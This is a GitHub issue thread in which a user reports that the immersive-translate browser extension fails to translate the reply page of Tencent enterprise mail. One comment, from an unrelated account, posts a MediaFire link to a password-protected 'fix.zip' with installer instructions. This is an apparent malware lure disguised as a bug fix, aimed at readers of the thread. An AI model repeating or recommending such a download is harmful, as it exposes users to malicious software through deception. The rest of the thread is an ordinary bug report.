### ISSUE TITLE
[Bug]: 无法翻译正在回复的邮件页面

### ISSUE THREAD

**Issue by XSJFYZS** [immersive-translate/immersive-translate#2047]
### 插件版本号 | Version

0.55

### 平台 | Platform

Windows

### 浏览器 | Browsers

Chrome

### 插件类型 | Extension Type

浏览器插件 | Browser Extension

### 请描述这个Bug | Describe the bug

![1](https://github.com/user-attachments/assets/365d6f21-94fe-4b43-872a-ab58f3dc0ca3)
![2](https://github.com/user-attachments/assets/20f05ff1-a63f-4435-9b17-4c8c4ba96150)
我使用腾讯企业邮箱。
如图所示，邮件处于打开状态时是可以被翻译的，但是我点击回复后的页面无法被翻译。
谷歌浏览器本身的翻译没问题.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by XSJFYZS** [comment]
1.8.2版本
